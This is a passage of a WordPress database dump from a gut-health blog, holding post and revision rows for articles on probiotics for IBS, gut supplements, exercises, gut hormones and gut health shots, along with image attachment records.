2. Probiotics for IBS if your primary symptoms are Constipation:

\n\n\n\n

Ritual Synbiotic+: Probiotic, Prebiotic, Postbiotic, 3-in-1 Formula for Gut Health, Bloat Support, Immune Support, Delayed-Released Capsule Designed to Thrive, 30 Vegan Capsules

\n\n\n\n\"\"\n\n\n\n

DrFormulas Nexabiotic 23 Multi Probiotic for Women and Men - Dr. formulated with Lactobacillus Acidophilus, Bifidobacterium Infantis, Saccharomyces Boulardii, 17.25 Billion CFUs

\n\n\n\n\"\"\n\n\n\n

3. Probiotics for IBS if you have mixed symptoms (bloating, gas, diarrhoea, constipation)

\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 45 Capsules

\n\n\n\n\"\"\n\n\n\n

Bio-Kult Advanced Probiotics -14 Strains, Probiotic Supplement for Adults, Lactobacillus Acidophilus, No Need for Refrigeration, Non-GMO, Gluten Free -Capsules,120 Count

\n\n\n\n\"\"\n\n\n\n

Inessa Advanced Daily Biotic, Probiotics Lactobacillus Rhamnosus, Powerful Digestive Support Probiotics with 10 Billion CFU, Globally Superior Strain, 60 Vegan Capsules for Men & Women

\n\n\n\n\"\"\n\n\n\n

Optibac Probiotics for Daily Wellbeing - Pack of 30 Capsules

\n\n\n\n\"\"\n','Finding Relief, The Top Probiotics for IBS 2023','','publish','open','open','','finding-relief-the-top-probiotics-for-ibs-2023','','','2023-10-12 07:46:03','2023-10-12 07:46:03','',0,'https://tummyrevolution.com/?p=5551',0,'post','',0),(5552,1,'2023-09-14 06:32:17','2023-09-14 06:32:17','\n

Irritable Bowel Syndrome (IBS) is a common gastrointestinal disorder that can lead to symptoms like abdominal pain, bloating, gas, and changes in bowel habits. While the effectiveness of probiotics in managing IBS can vary from person to person, some probiotic strains have shown promise in alleviating symptoms. Here are five probiotics that are often recommended for individuals with IBS:

\n\n\n\n
    \n
  1. Bifidobacterium Infantis: B. infantis is known for its ability to help rebalance gut microbiota and improve symptoms of IBS, particularly those with diarrhea-predominant IBS (IBS-D). It may help reduce abdominal pain, bloating, and improve stool consistency.
  2. \n\n\n\n
  3. Lactobacillus Plantarum: This strain has demonstrated anti-inflammatory properties and can help regulate gut motility. It has been studied for its potential to alleviate symptoms in various types of IBS.
  4. \n\n\n\n
  5. Lactobacillus Acidophilus: L. acidophilus can help restore balance to the gut microbiota and promote better digestion. It\'s commonly found in fermented foods and yogurt.
  6. \n\n\n\n
  7. Bifidobacterium Longum: B. longum has been shown to have positive effects on gut health and may help reduce symptoms of IBS, including bloating and discomfort.
  8. \n\n\n\n
  9. Lactobacillus Rhamnosus GG: This strain is well-researched and has shown promise in managing IBS symptoms, especially in those with irritable bowel syndrome with constipation (IBS-C) and IBS-D.
  10. \n
\n\n\n\n

When selecting a probiotic for IBS, keep in mind that the specific formulation and dosage can matter. Also, different people might respond better to different strains. It\'s advisable to consult with a healthcare professional before starting any new supplement, especially if you have a medical condition or are taking other medications.

\n\n\n\n

Additionally, the effectiveness of probiotics in managing IBS can be influenced by various factors, including the severity of your symptoms, the underlying causes of your IBS, and your overall health. It may take some time to find the right probiotic and dosage that works best for you.

\n\n\n\n

As research in this area is ongoing, it\'s a good idea to stay informed about the latest scientific developments related to probiotics and IBS. Keep an eye out for clinical studies and evidence-based recommendations to make the most informed decisions for your health.

\n','Finding Relief, The Top Probiotics for IBS','','inherit','closed','closed','','5551-revision-v1','','','2023-09-14 06:32:17','2023-09-14 06:32:17','',5551,'https://tummyrevolution.com/?p=5552',0,'revision','',0),(5553,1,'2023-09-14 06:54:53','0000-00-00 00:00:00','\n

Maintaining good gut health has become a buzzword in recent years, and with it, the market for gut supplements has exploded. But are these supplements really worth the hype and your hard-earned money? Let\'s delve into the world of gut supplements to find out.

\n\n\n\n

The Gut-Health Connection

\n\n\n\n

First, it\'s essential to understand the critical role our gut plays in overall health. A healthy gut is responsible for digestion, nutrient absorption, immune system support, and even influences our mood and brain health. A balanced gut microbiome, the community of trillions of microorganisms residing in our intestines, is vital for all these functions.

\n\n\n\n

Diet and Lifestyle First

\n\n\n\n

Before considering gut supplements, it\'s crucial to focus on your diet and lifestyle. A balanced diet rich in fiber, fruits, vegetables, and fermented foods can help promote a healthy gut microbiome. Regular exercise, adequate sleep, and stress management also play significant roles in gut health.

\n\n\n\n

Probiotics: The Most Popular Gut Supplement

\n\n\n\n

Probiotics are live bacteria that are believed to benefit the gut. They are commonly found in fermented foods like yogurt, kefir, and kimchi. Probiotic supplements are popular, with claims of aiding digestion, boosting the immune system, and improving mood.

\n\n\n\n

While probiotics can be beneficial for some individuals, their effectiveness varies greatly depending on the strain and the person\'s unique gut composition. It\'s essential to choose a reputable probiotic brand, consult with a healthcare professional, and be aware that they might not work for everyone.

\n\n\n\n

Prebiotics: The Unsung Heroes

\n\n\n\n

Prebiotics are dietary fibers that nourish the beneficial bacteria in your gut. They are found in foods like garlic, onions, bananas, and whole grains. Including more prebiotic-rich foods in your diet can naturally support a healthy gut microbiome.

\n\n\n\n

Other Gut Supplements

\n\n\n\n

Aside from probiotics and prebiotics, there are various other gut supplements on the market, such as digestive enzymes, fiber supplements, and herbal remedies. The effectiveness of these supplements can vary, and it\'s essential to consult with a healthcare provider before taking them.

\n\n\n\n

The Bottom Line

\n\n\n\n

Gut supplements can be worth it for some individuals, especially those with specific gut-related issues or dietary restrictions that make it challenging to maintain a balanced gut microbiome. However, for most people, a well-rounded diet rich in fiber and fermented foods, combined with a healthy lifestyle, is usually sufficient to support gut health.

\n\n\n\n

In conclusion, gut supplements can have their place in promoting gut health, but they are not a one-size-fits-all solution. Before reaching for supplements, prioritize a diet and lifestyle that naturally nurtures your gut. And when considering supplements, consult with a healthcare professional to determine what\'s right for you. Ultimately, a holistic approach to gut health is often the most effective and sustainable way to reap the benefits of a balanced gut microbiome.

\n','Gut Health Supplements: Are They Worth It','','draft','open','open','','','','','2023-09-14 06:54:53','2023-09-14 06:54:53','',0,'https://tummyrevolution.com/?p=5553',0,'post','',0),(5554,1,'2023-09-14 06:53:12','2023-09-14 06:53:12','What supplements to choose for gut health','suppliments','','inherit','open','closed','','suppliments','','','2023-09-14 06:54:36','2023-09-14 06:54:36','',5553,'http://tummyrevolution.com/wp-content/uploads/2023/09/suppliments.jpg',0,'attachment','image/jpeg',0),(5555,1,'2023-09-14 06:54:52','2023-09-14 06:54:52','\n

Maintaining good gut health has become a buzzword in recent years, and with it, the market for gut supplements has exploded. But are these supplements really worth the hype and your hard-earned money? Let\'s delve into the world of gut supplements to find out.

\n\n\n\n

The Gut-Health Connection

\n\n\n\n

First, it\'s essential to understand the critical role our gut plays in overall health. A healthy gut is responsible for digestion, nutrient absorption, immune system support, and even influences our mood and brain health. A balanced gut microbiome, the community of trillions of microorganisms residing in our intestines, is vital for all these functions.

\n\n\n\n

Diet and Lifestyle First

\n\n\n\n

Before considering gut supplements, it\'s crucial to focus on your diet and lifestyle. A balanced diet rich in fiber, fruits, vegetables, and fermented foods can help promote a healthy gut microbiome. Regular exercise, adequate sleep, and stress management also play significant roles in gut health.

\n\n\n\n

Probiotics: The Most Popular Gut Supplement

\n\n\n\n

Probiotics are live bacteria that are believed to benefit the gut. They are commonly found in fermented foods like yogurt, kefir, and kimchi. Probiotic supplements are popular, with claims of aiding digestion, boosting the immune system, and improving mood.

\n\n\n\n

While probiotics can be beneficial for some individuals, their effectiveness varies greatly depending on the strain and the person\'s unique gut composition. It\'s essential to choose a reputable probiotic brand, consult with a healthcare professional, and be aware that they might not work for everyone.

\n\n\n\n

Prebiotics: The Unsung Heroes

\n\n\n\n

Prebiotics are dietary fibers that nourish the beneficial bacteria in your gut. They are found in foods like garlic, onions, bananas, and whole grains. Including more prebiotic-rich foods in your diet can naturally support a healthy gut microbiome.

\n\n\n\n

Other Gut Supplements

\n\n\n\n

Aside from probiotics and prebiotics, there are various other gut supplements on the market, such as digestive enzymes, fiber supplements, and herbal remedies. The effectiveness of these supplements can vary, and it\'s essential to consult with a healthcare provider before taking them.

\n\n\n\n

The Bottom Line

\n\n\n\n

Gut supplements can be worth it for some individuals, especially those with specific gut-related issues or dietary restrictions that make it challenging to maintain a balanced gut microbiome. However, for most people, a well-rounded diet rich in fiber and fermented foods, combined with a healthy lifestyle, is usually sufficient to support gut health.

\n\n\n\n

In conclusion, gut supplements can have their place in promoting gut health, but they are not a one-size-fits-all solution. Before reaching for supplements, prioritize a diet and lifestyle that naturally nurtures your gut. And when considering supplements, consult with a healthcare professional to determine what\'s right for you. Ultimately, a holistic approach to gut health is often the most effective and sustainable way to reap the benefits of a balanced gut microbiome.

\n','Gut Health Supplements: Are They Worth It','','inherit','closed','closed','','5553-revision-v1','','','2023-09-14 06:54:52','2023-09-14 06:54:52','',5553,'https://tummyrevolution.com/?p=5555',0,'revision','',0),(5556,1,'2023-09-14 07:03:11','0000-00-00 00:00:00','\n

Title: 5 Simple Yet Best Exercises for Gut Health

\n\n\n\n

Introduction

\n\n\n\n

Maintaining a healthy gut is essential for overall well-being. A balanced gut contributes to better digestion, a stronger immune system, and even improved mood. While a balanced diet plays a crucial role in gut health, regular exercise is another key factor that shouldn\'t be overlooked. In this blog post, we will explore five simple yet effective exercises to promote gut health.

\n\n\n\n
    \n
  1. Yoga
  2. \n
\n\n\n\n

Yoga is a gentle yet powerful exercise that can work wonders for your gut health. It combines various poses and breathing techniques that help to reduce stress, a major contributor to gut issues. Stress can disrupt the balance of good and bad bacteria in the gut, leading to digestive problems. Practicing yoga regularly can lower stress levels, promote relaxation, and improve digestion.

\n\n\n\n

Some yoga poses that are particularly beneficial for gut health include the Child\'s Pose, Cat-Cow Pose, and Seated Forward Bend. These poses can help stimulate digestion, reduce bloating, and alleviate constipation.

\n\n\n\n
    \n
  1. Aerobic Exercise
  2. \n
\n\n\n\n

Aerobic exercises like jogging, swimming, or brisk walking can significantly improve gut health. They increase blood flow to the intestines, which helps nourish the gut lining and enhance its functionality. Aerobic exercise also promotes the growth of beneficial gut bacteria and reduces inflammation.

\n\n\n\n

Engaging in 30 minutes of moderate-intensity aerobic exercise most days of the week can have a positive impact on your gut. It\'s a simple way to keep your digestive system running smoothly.

\n\n\n\n
    \n
  1. Core Strengthening Exercises
  2. \n
\n\n\n\n

A strong core is essential for proper digestion and overall gut health. Core muscles help support the organs in the abdominal area, which aids in digestion and reduces the risk of gastrointestinal issues. Exercises like planks, leg raises, and bicycle crunches are excellent for strengthening your core.

\n\n\n\n

By incorporating these exercises into your routine, you can maintain a stable core, reduce the risk of digestive discomfort, and even prevent back pain associated with poor posture.

\n\n\n\n
    \n
  1. Breathing Exercises
  2. \n
\n\n\n\n

Surprisingly, breathing exercises can have a significant impact on gut health. Deep, diaphragmatic breathing can help relax the nervous system, reduce stress, and improve the gut-brain connection. Stress and anxiety can negatively affect gut function, so practicing deep breathing techniques can be a simple yet effective way to support gut health.

\n\n\n\n

The 4-7-8 breathing technique, for instance, involves inhaling for a count of 4, holding for 7, and exhaling for 8. Regular practice can help calm your mind and positively influence your gut.

\n\n\n\n
    \n
  1. Pelvic Floor Exercises
  2. \n
\n\n\n\n

A healthy gut relies on a well-functioning pelvic floor. Weak pelvic floor muscles can lead to issues like constipation and incontinence. Pelvic floor exercises, often called Kegel exercises, can help strengthen these muscles.

\n\n\n\n

To perform Kegel exercises, simply contract and relax your pelvic floor muscles repeatedly. Incorporate these exercises into your daily routine to support a healthy gut and prevent digestive problems.

\n\n\n\n

Conclusion

\n\n\n\n

Maintaining gut health is crucial for overall well-being, and exercise plays a pivotal role in achieving this goal. By incorporating these simple yet effective exercises into your routine, you can promote digestion, reduce stress, and support a balanced gut microbiome. Remember to consult with a healthcare professional or fitness expert before starting any new exercise program, especially if you have underlying medical conditions. A holistic approach that combines a healthy diet, regular exercise, and stress management techniques will help you achieve and maintain optimal gut health.

\n','Gut Goodness: 5 Belly-Friendly Exercises to Keep You Feeling Fabulous!','','draft','open','open','','','','','2023-09-14 07:03:11','2023-09-14 07:03:11','',0,'https://tummyrevolution.com/?p=5556',0,'post','',0),(5557,1,'2023-09-14 07:03:09','2023-09-14 07:03:09','\n

Title: 5 Simple Yet Best Exercises for Gut Health

\n\n\n\n

Introduction

\n\n\n\n

Maintaining a healthy gut is essential for overall well-being. A balanced gut contributes to better digestion, a stronger immune system, and even improved mood. While a balanced diet plays a crucial role in gut health, regular exercise is another key factor that shouldn\'t be overlooked. In this blog post, we will explore five simple yet effective exercises to promote gut health.

\n\n\n\n
    \n
  1. Yoga
  2. \n
\n\n\n\n

Yoga is a gentle yet powerful exercise that can work wonders for your gut health. It combines various poses and breathing techniques that help to reduce stress, a major contributor to gut issues. Stress can disrupt the balance of good and bad bacteria in the gut, leading to digestive problems. Practicing yoga regularly can lower stress levels, promote relaxation, and improve digestion.

\n\n\n\n

Some yoga poses that are particularly beneficial for gut health include the Child\'s Pose, Cat-Cow Pose, and Seated Forward Bend. These poses can help stimulate digestion, reduce bloating, and alleviate constipation.

\n\n\n\n
    \n
  1. Aerobic Exercise
  2. \n
\n\n\n\n

Aerobic exercises like jogging, swimming, or brisk walking can significantly improve gut health. They increase blood flow to the intestines, which helps nourish the gut lining and enhance its functionality. Aerobic exercise also promotes the growth of beneficial gut bacteria and reduces inflammation.

\n\n\n\n

Engaging in 30 minutes of moderate-intensity aerobic exercise most days of the week can have a positive impact on your gut. It\'s a simple way to keep your digestive system running smoothly.

\n\n\n\n
    \n
  1. Core Strengthening Exercises
  2. \n
\n\n\n\n

A strong core is essential for proper digestion and overall gut health. Core muscles help support the organs in the abdominal area, which aids in digestion and reduces the risk of gastrointestinal issues. Exercises like planks, leg raises, and bicycle crunches are excellent for strengthening your core.

\n\n\n\n

By incorporating these exercises into your routine, you can maintain a stable core, reduce the risk of digestive discomfort, and even prevent back pain associated with poor posture.

\n\n\n\n
    \n
  1. Breathing Exercises
  2. \n
\n\n\n\n

Surprisingly, breathing exercises can have a significant impact on gut health. Deep, diaphragmatic breathing can help relax the nervous system, reduce stress, and improve the gut-brain connection. Stress and anxiety can negatively affect gut function, so practicing deep breathing techniques can be a simple yet effective way to support gut health.

\n\n\n\n

The 4-7-8 breathing technique, for instance, involves inhaling for a count of 4, holding for 7, and exhaling for 8. Regular practice can help calm your mind and positively influence your gut.

\n\n\n\n
    \n
  1. Pelvic Floor Exercises
  2. \n
\n\n\n\n

A healthy gut relies on a well-functioning pelvic floor. Weak pelvic floor muscles can lead to issues like constipation and incontinence. Pelvic floor exercises, often called Kegel exercises, can help strengthen these muscles.

\n\n\n\n

To perform Kegel exercises, simply contract and relax your pelvic floor muscles repeatedly. Incorporate these exercises into your daily routine to support a healthy gut and prevent digestive problems.

\n\n\n\n

Conclusion

\n\n\n\n

Maintaining gut health is crucial for overall well-being, and exercise plays a pivotal role in achieving this goal. By incorporating these simple yet effective exercises into your routine, you can promote digestion, reduce stress, and support a balanced gut microbiome. Remember to consult with a healthcare professional or fitness expert before starting any new exercise program, especially if you have underlying medical conditions. A holistic approach that combines a healthy diet, regular exercise, and stress management techniques will help you achieve and maintain optimal gut health.

\n','Gut Goodness: 5 Belly-Friendly Exercises to Keep You Feeling Fabulous!','','inherit','closed','closed','','5556-revision-v1','','','2023-09-14 07:03:09','2023-09-14 07:03:09','',5556,'https://tummyrevolution.com/?p=5557',0,'revision','',0),(5558,1,'2023-09-14 07:42:17','0000-00-00 00:00:00','\n

You\'ve probably heard that a balanced diet and a healthy lifestyle are essential for overall well-being. But did you know that the state of your gut can have a significant impact on your hormones? That\'s right – the trillions of microbes residing in your gut play a crucial role in regulating your hormonal balance. In this blog post, we\'ll dive deep into the fascinating world of gut health and how it can affect your hormones.

\n\n\n\n
    \n
  1. Gut Microbiome 101: Your gut is home to an intricate ecosystem of bacteria, viruses, and fungi collectively known as the gut microbiome. These microorganisms play various roles in digestion, nutrient absorption, and immune function. But they also have a surprising influence on your hormones.
  2. \n\n\n\n
  3. Hormonal Harmony: Hormones are chemical messengers that regulate numerous bodily functions, including metabolism, mood, sleep, and reproductive health. When they are in balance, you feel your best. However, an imbalance can lead to a range of issues, from weight gain to mood swings.
  4. \n\n\n\n
  5. Gut Health and Hormones: So, how do your gut and hormones interact? It turns out that your gut microbiome can impact hormone production, metabolism, and even mood regulation. Here are a few ways this connection works:
    • Inflammation: A healthy gut can help keep inflammation in check. Chronic inflammation can disrupt hormone production and lead to conditions like polycystic ovary syndrome (PCOS) and insulin resistance.
    \n
      \n
    • Serotonin Production: Did you know that about 90% of serotonin, a mood-regulating hormone, is produced in your gut? A balanced gut microbiome is essential for maintaining a positive mood and managing stress.
    • \n\n\n\n
    • Hormone Metabolism: The gut microbiome can help metabolize hormones, such as estrogen. An imbalance in gut bacteria can lead to an inefficient breakdown of hormones, potentially contributing to hormonal imbalances.
    • \n
    \n
  6. \n\n\n\n
  7. Tips for a Healthy Gut and Balanced Hormones: Now that we understand the gut-hormone connection, here are some practical tips to maintain both gut and hormonal health:
  8. \n
\n\n\n\n
    \n
  • Eat a diverse diet: Consume a wide range of fiber-rich foods, prebiotics, and probiotics to support a healthy gut microbiome.
  • \n\n\n\n
  • Manage stress: Chronic stress can wreak havoc on your hormones and gut. Practice relaxation techniques like meditation and yoga.
  • \n\n\n\n
  • Limit processed foods: Excess sugar, artificial additives, and unhealthy fats can disrupt the gut microbiome and hormone balance.
  • \n\n\n\n
  • Stay hydrated: Drinking enough water is essential for digestion and overall gut health.
  • \n
\n','The Gut-Hormone Connection: How Your Gut Health Impacts Your Hormones','','draft','open','open','','','','','2023-09-14 07:42:17','2023-09-14 07:42:17','',0,'https://tummyrevolution.com/?p=5558',0,'post','',0),(5559,1,'2023-09-14 07:26:44','2023-09-14 07:26:44','\n

You\'ve probably heard that a balanced diet and a healthy lifestyle are essential for overall well-being. But did you know that the state of your gut can have a significant impact on your hormones? That\'s right – the trillions of microbes residing in your gut play a crucial role in regulating your hormonal balance. In this blog post, we\'ll dive deep into the fascinating world of gut health and how it can affect your hormones.

\n\n\n\n
    \n
  1. Gut Microbiome 101: Your gut is home to an intricate ecosystem of bacteria, viruses, and fungi collectively known as the gut microbiome. These microorganisms play various roles in digestion, nutrient absorption, and immune function. But they also have a surprising influence on your hormones.
  2. \n\n\n\n
  3. Hormonal Harmony: Hormones are chemical messengers that regulate numerous bodily functions, including metabolism, mood, sleep, and reproductive health. When they are in balance, you feel your best. However, an imbalance can lead to a range of issues, from weight gain to mood swings.
  4. \n\n\n\n
  5. Gut Health and Hormones: So, how do your gut and hormones interact? It turns out that your gut microbiome can impact hormone production, metabolism, and even mood regulation. Here are a few ways this connection works:
    • Inflammation: A healthy gut can help keep inflammation in check. Chronic inflammation can disrupt hormone production and lead to conditions like polycystic ovary syndrome (PCOS) and insulin resistance.
    \n
      \n
    • Serotonin Production: Did you know that about 90% of serotonin, a mood-regulating hormone, is produced in your gut? A balanced gut microbiome is essential for maintaining a positive mood and managing stress.
    • \n\n\n\n
    • Hormone Metabolism: The gut microbiome can help metabolize hormones, such as estrogen. An imbalance in gut bacteria can lead to an inefficient breakdown of hormones, potentially contributing to hormonal imbalances.
    • \n
    \n
  6. \n\n\n\n
  7. Tips for a Healthy Gut and Balanced Hormones: Now that we understand the gut-hormone connection, here are some practical tips to maintain both gut and hormonal health:
  8. \n
\n\n\n\n
    \n
  • Eat a diverse diet: Consume a wide range of fiber-rich foods, prebiotics, and probiotics to support a healthy gut microbiome.
  • \n\n\n\n
  • Manage stress: Chronic stress can wreak havoc on your hormones and gut. Practice relaxation techniques like meditation and yoga.
  • \n\n\n\n
  • Limit processed foods: Excess sugar, artificial additives, and unhealthy fats can disrupt the gut microbiome and hormone balance.
  • \n\n\n\n
  • Stay hydrated: Drinking enough water is essential for digestion and overall gut health.
  • \n
\n','The Gut-Hormone Connection: How Your Gut Health Impacts Your Hormones','','inherit','closed','closed','','5558-revision-v1','','','2023-09-14 07:26:44','2023-09-14 07:26:44','',5558,'https://tummyrevolution.com/?p=5559',0,'revision','',0),(5560,1,'2023-09-14 07:39:02','2023-09-14 07:39:02','How hormones affect the gut','Hormones & gut','','inherit','open','closed','','hormones-gut','','','2023-09-14 07:41:11','2023-09-14 07:41:11','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/Hormones-gut.jpg',0,'attachment','image/jpeg',0),(5561,1,'2023-09-14 07:39:59','2023-09-14 07:39:59','How supplements and food work together to enhance health','suppliments','How does supplements works','inherit','open','closed','','suppliments-2','','','2023-09-17 07:30:37','2023-09-17 07:30:37','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/suppliments-1.jpg',0,'attachment','image/jpeg',0),(5562,1,'2023-09-14 07:40:15','2023-09-14 07:40:15','','Alcohol and microbiome','','inherit','open','closed','','alcohol-and-microbiome','','','2023-09-14 07:40:15','2023-09-14 07:40:15','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/Alcohol-and-microbiome.jpg',0,'attachment','image/jpeg',0),(5563,1,'2023-09-14 07:40:27','2023-09-14 07:40:27','','Self Help','','inherit','open','closed','','self-help','','','2023-09-14 07:40:27','2023-09-14 07:40:27','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/Self-Help.jpg',0,'attachment','image/jpeg',0),(5564,1,'2023-09-14 07:40:33','2023-09-14 07:40:33','','Weight loss','','inherit','open','closed','','weight-loss','','','2023-09-14 07:40:33','2023-09-14 07:40:33','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/Weight-loss.jpg',0,'attachment','image/jpeg',0),(5565,1,'2023-09-14 07:40:42','2023-09-14 07:40:42','','Health','','inherit','open','closed','','health','','','2023-09-14 07:40:42','2023-09-14 07:40:42','',5558,'http://tummyrevolution.com/wp-content/uploads/2023/09/Health.jpg',0,'attachment','image/jpeg',0),(5566,1,'2023-09-14 07:42:14','2023-09-14 07:42:14','\n

You\'ve probably heard that a balanced diet and a healthy lifestyle are essential for overall well-being. But did you know that the state of your gut can have a significant impact on your hormones? That\'s right – the trillions of microbes residing in your gut play a crucial role in regulating your hormonal balance. In this blog post, we\'ll dive deep into the fascinating world of gut health and how it can affect your hormones.

\n\n\n\n
    \n
  1. Gut Microbiome 101: Your gut is home to an intricate ecosystem of bacteria, viruses, and fungi collectively known as the gut microbiome. These microorganisms play various roles in digestion, nutrient absorption, and immune function. But they also have a surprising influence on your hormones.
  2. \n\n\n\n
  3. Hormonal Harmony: Hormones are chemical messengers that regulate numerous bodily functions, including metabolism, mood, sleep, and reproductive health. When they are in balance, you feel your best. However, an imbalance can lead to a range of issues, from weight gain to mood swings.
  4. \n\n\n\n
  5. Gut Health and Hormones: So, how do your gut and hormones interact? It turns out that your gut microbiome can impact hormone production, metabolism, and even mood regulation. Here are a few ways this connection works:
    • Inflammation: A healthy gut can help keep inflammation in check. Chronic inflammation can disrupt hormone production and lead to conditions like polycystic ovary syndrome (PCOS) and insulin resistance.
    \n
      \n
    • Serotonin Production: Did you know that about 90% of serotonin, a mood-regulating hormone, is produced in your gut? A balanced gut microbiome is essential for maintaining a positive mood and managing stress.
    • \n\n\n\n
    • Hormone Metabolism: The gut microbiome can help metabolize hormones, such as estrogen. An imbalance in gut bacteria can lead to an inefficient breakdown of hormones, potentially contributing to hormonal imbalances.
    • \n
    \n
  6. \n\n\n\n
  7. Tips for a Healthy Gut and Balanced Hormones: Now that we understand the gut-hormone connection, here are some practical tips to maintain both gut and hormonal health:
  8. \n
\n\n\n\n
    \n
  • Eat a diverse diet: Consume a wide range of fiber-rich foods, prebiotics, and probiotics to support a healthy gut microbiome.
  • \n\n\n\n
  • Manage stress: Chronic stress can wreak havoc on your hormones and gut. Practice relaxation techniques like meditation and yoga.
  • \n\n\n\n
  • Limit processed foods: Excess sugar, artificial additives, and unhealthy fats can disrupt the gut microbiome and hormone balance.
  • \n\n\n\n
  • Stay hydrated: Drinking enough water is essential for digestion and overall gut health.
  • \n
\n','The Gut-Hormone Connection: How Your Gut Health Impacts Your Hormones','','inherit','closed','closed','','5558-revision-v1','','','2023-09-14 07:42:14','2023-09-14 07:42:14','',5558,'https://tummyrevolution.com/?p=5566',0,'revision','',0),(5567,1,'2023-09-14 08:00:58','0000-00-00 00:00:00','\n

In recent years, the health and wellness industry has witnessed a surge in the popularity of gut health shots. These tiny, potent beverages claim to promote a healthy gut microbiome and offer a wide array of health benefits. But are gut health shots really as good for you as they claim to be? Let\'s explore the science behind these shots to find out.

\n\n\n\n

What Are Gut Health Shots?

\n\n\n\n

Gut health shots typically contain a mixture of ingredients designed to support digestive health. Common components include probiotics, prebiotics, and various herbs or spices known for their potential digestive benefits. Probiotics are beneficial bacteria that can help maintain a balanced gut microbiome, while prebiotics serve as food for these bacteria, promoting their growth and activity.

\n\n\n\n

The Benefits of Gut Health Shots:

\n\n\n\n

1. Improved Digestion: Probiotics in gut health shots can help regulate digestion by maintaining a healthy balance of gut bacteria. This can lead to reduced bloating, gas, and other digestive discomforts.

\n\n\n\n

2. Enhanced Nutrient Absorption: A healthy gut microbiome plays a crucial role in absorbing nutrients from the food we eat. Gut health shots can aid in this process, ensuring you get the most out of your diet.

\n\n\n\n

3. Stronger Immune System: A significant portion of the immune system resides in the gut. By promoting a diverse and balanced microbiome, gut health shots may bolster your immunity.

\n\n\n\n

4. Mood and Mental Health: Emerging research suggests a strong connection between gut health and mental well-being. Some people report feeling better mentally and emotionally after incorporating gut health shots into their routine.

\n\n\n\n

What to Consider:

\n\n\n\n

While gut health shots offer promising benefits, there are a few important factors to consider:

\n\n\n\n

1. Individual Variation: Not everyone\'s gut is the same. What works for one person may not have the same effect on another. It\'s essential to listen to your body and monitor how gut health shots affect you personally.

\n\n\n\n

2. Diet and Lifestyle: Gut health is influenced by various factors, including diet, stress levels, and physical activity. Gut health shots should be seen as part of a broader approach to overall well-being.

\n\n\n\n

3. Quality Matters: The effectiveness of gut health shots largely depends on the quality of the ingredients and the specific strains of probiotics included. Be sure to choose products from reputable brands with a track record of producing high-quality supplements.

\n\n\n\n

4. Consult a Professional: If you have specific digestive issues or underlying health concerns, it\'s a good idea to consult with a healthcare professional or a registered dietitian before adding gut health shots to your routine.

\n\n\n\n

In conclusion, gut health shots can be a valuable addition to your wellness routine, offering potential benefits for digestion, immunity, and even mood. However, like any dietary supplement, they should be used mindfully and in conjunction with a balanced diet and a healthy lifestyle. Ultimately, the key to a healthier gut is a holistic approach that includes a variety of whole foods, stress management, and, if appropriate, the incorporation of gut health shots to support your microbiome.

\n','Are Gut Health Shots Good for You?','','draft','open','open','','','','','2023-09-14 08:00:58','2023-09-14 08:00:58','',0,'https://tummyrevolution.com/?p=5567',0,'post','',0),(5568,1,'2023-09-14 07:57:11','2023-09-14 07:57:11','Are Gut health shots good for you','Health Shots','Gut Health shots','inherit','open','closed','','health-shots','','','2023-09-14 07:57:59','2023-09-14 07:57:59','',5567,'http://tummyrevolution.com/wp-content/uploads/2023/09/Health-Shots.jpg',0,'attachment','image/jpeg',0),(5569,1,'2023-09-14 07:59:01','2023-09-14 07:59:01','','Health-Shots-1','','inherit','open','closed','','health-shots-1','','','2023-09-14 07:59:01','2023-09-14 07:59:01','',5567,'http://tummyrevolution.com/wp-content/uploads/2023/09/Health-Shots-1.jpg',0,'attachment','image/jpeg',0),(5570,1,'2023-09-14 07:59:17','2023-09-14 07:59:17','Are gut health shots good for you','Health Shots','','inherit','open','closed','','health-shots-2','','','2023-09-14 07:59:47','2023-09-14 07:59:47','',5567,'http://tummyrevolution.com/wp-content/uploads/2023/09/Health-Shots-2.jpg',0,'attachment','image/jpeg',0),(5571,1,'2023-09-14 08:00:21','2023-09-14 08:00:21','\n

In recent years, the health and wellness industry has witnessed a surge in the popularity of gut health shots. These tiny, potent beverages claim to promote a healthy gut microbiome and offer a wide array of health benefits. But are gut health shots really as good for you as they claim to be? Let\'s explore the science behind these shots to find out.

\n\n\n\n

What Are Gut Health Shots?

\n\n\n\n

Gut health shots typically contain a mixture of ingredients designed to support digestive health. Common components include probiotics, prebiotics, and various herbs or spices known for their potential digestive benefits. Probiotics are beneficial bacteria that can help maintain a balanced gut microbiome, while prebiotics serve as food for these bacteria, promoting their growth and activity.

\n\n\n\n

The Benefits of Gut Health Shots:

\n\n\n\n

1. Improved Digestion: Probiotics in gut health shots can help regulate digestion by maintaining a healthy balance of gut bacteria. This can lead to reduced bloating, gas, and other digestive discomforts.

\n\n\n\n

2. Enhanced Nutrient Absorption: A healthy gut microbiome plays a crucial role in absorbing nutrients from the food we eat. Gut health shots can aid in this process, ensuring you get the most out of your diet.

\n\n\n\n

3. Stronger Immune System: A significant portion of the immune system resides in the gut. By promoting a diverse and balanced microbiome, gut health shots may bolster your immunity.

\n\n\n\n

4. Mood and Mental Health: Emerging research suggests a strong connection between gut health and mental well-being. Some people report feeling better mentally and emotionally after incorporating gut health shots into their routine.

\n\n\n\n

What to Consider:

\n\n\n\n

While gut health shots offer promising benefits, there are a few important factors to consider:

\n\n\n\n

1. Individual Variation: Not everyone\'s gut is the same. What works for one person may not have the same effect on another. It\'s essential to listen to your body and monitor how gut health shots affect you personally.

\n\n\n\n

2. Diet and Lifestyle: Gut health is influenced by various factors, including diet, stress levels, and physical activity. Gut health shots should be seen as part of a broader approach to overall well-being.

\n\n\n\n

3. Quality Matters: The effectiveness of gut health shots largely depends on the quality of the ingredients and the specific strains of probiotics included. Be sure to choose products from reputable brands with a track record of producing high-quality supplements.

\n\n\n\n

4. Consult a Professional: If you have specific digestive issues or underlying health concerns, it\'s a good idea to consult with a healthcare professional or a registered dietitian before adding gut health shots to your routine.

\n\n\n\n

